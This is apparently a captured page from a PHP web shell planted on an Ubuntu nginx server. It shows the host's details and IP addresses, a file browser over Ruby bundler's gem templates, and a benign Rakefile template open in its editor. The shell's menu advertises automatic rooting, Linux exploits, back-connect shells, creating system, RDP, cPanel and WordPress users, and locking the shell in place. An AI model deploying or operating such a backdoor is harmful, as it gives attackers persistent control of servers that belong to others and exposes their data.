Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.2
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
ruby /
3.0.0 /
bundler /
templates /
newgem /
[ HOME SHELL ]
Name
Size
Permission
Action
bin
[ DIR ]
drwxr-xr-x
circleci
[ DIR ]
drwxr-xr-x
exe
[ DIR ]
drwxr-xr-x
ext
[ DIR ]
drwxr-xr-x
github
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
spec
[ DIR ]
drwxr-xr-x
test
[ DIR ]
drwxr-xr-x
CHANGELOG.md.tt
80
B
-rw-r--r--
CODE_OF_CONDUCT.md.tt
5.1
KB
-rw-r--r--
Gemfile.tt
419
B
-rw-r--r--
LICENSE.txt.tt
1.08
KB
-rw-r--r--
README.md.tt
2.37
KB
-rw-r--r--
Rakefile.tt
988
B
-rw-r--r--
gitignore.tt
228
B
-rw-r--r--
gitlab-ci.yml.tt
165
B
-rw-r--r--
newgem.gemspec.tt
1.78
KB
-rw-r--r--
rspec.tt
53
B
-rw-r--r--
rubocop.yml.tt
299
B
-rw-r--r--
travis.yml.tt
126
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Rakefile.tt
# frozen_string_literal: true require "bundler/gem_tasks" <% default_task_names = [config[:test_task]].compact -%> <% case config[:test] -%> <% when "minitest", "test-unit" -%> require "rake/testtask" Rake::TestTask.new(:test) do |t| t.libs << "test" t.libs << "lib" t.test_files = FileList["test/**/*_test.rb"] end <% when "rspec" -%> require "rspec/core/rake_task" RSpec::Core::RakeTask.new(:spec) <% end -%> <% if config[:rubocop] -%> <% default_task_names << :rubocop -%> require "rubocop/rake_task" RuboCop::RakeTask.new <% end -%> <% if config[:ext] -%> <% default_task_names.unshift(:clobber, :compile) -%> require "rake/extensiontask" task build: :compile Rake::ExtensionTask.new("<%= config[:underscored_name] %>") do |ext| ext.lib_dir = "lib/<%= config[:namespaced_path] %>" end <% end -%> <% if default_task_names.size == 1 -%> task default: <%= default_task_names.first.inspect %> <% else -%> task default: %i[<%= default_task_names.join(" ") %>] <% end -%>
Close